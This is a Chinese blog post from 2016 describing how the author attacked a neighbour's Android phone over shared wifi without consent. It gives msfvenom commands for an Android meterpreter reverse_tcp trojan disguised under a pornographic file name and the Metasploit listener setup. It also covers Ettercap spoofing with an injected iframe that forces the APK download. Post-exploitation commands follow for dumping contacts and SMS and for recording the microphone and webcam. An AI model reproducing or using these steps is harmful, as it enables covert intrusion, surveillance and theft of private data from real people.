Kali LinuxAndroid安全之路H4ck3r

Msf+Ettercap入侵邻居安卓手机

2016-11-07  本文已影响8805人  i轻

前言:

连别人的wifi不搞事情怎么可能?最近在学zANTI,不过不熟,咱们依旧kali走起。

做案工具:

Kali Linux(咳咳,开始。。。)

正文:

首先启动msf

先用kali生成一个安卓木马,如下命令:

Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk

为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻

然后进入Msf

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST 192.168.0.109 //ip为kaili的ip

set LPORT 44444 //端口一定要与前面生成的木马的端口一致

Exploit

下面我们开启ettercap -G

我物理IP为

别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的,

下面我们来设置一下

在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:

<,iframe src=http://192.168.0.109/ribenav.apk><,/iframe>  把那两个逗号删了

因为apk文件嘛要想直接提示下载,用iframe语句就OK了,

下面我们开始攻击

大概过了5分钟多,发现反弹成功了

执行命令

dump_contacts    --》这个是导出电话

dump_sms                 --》这个是导出信息

record_mic     Record audio from the default microphone for X seconds

webcam_chat    Start a video chat

webcam_list    List webcams

webcam_snap    Take a snapshot from the specified webcam

webcam_stream  Play a video stream from the specified webcam

我们打开看一下电话薄

我们同时欺骗成DroidJack木马,使用方法如图:

切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口

上一篇下一篇

猜你喜欢

热点阅读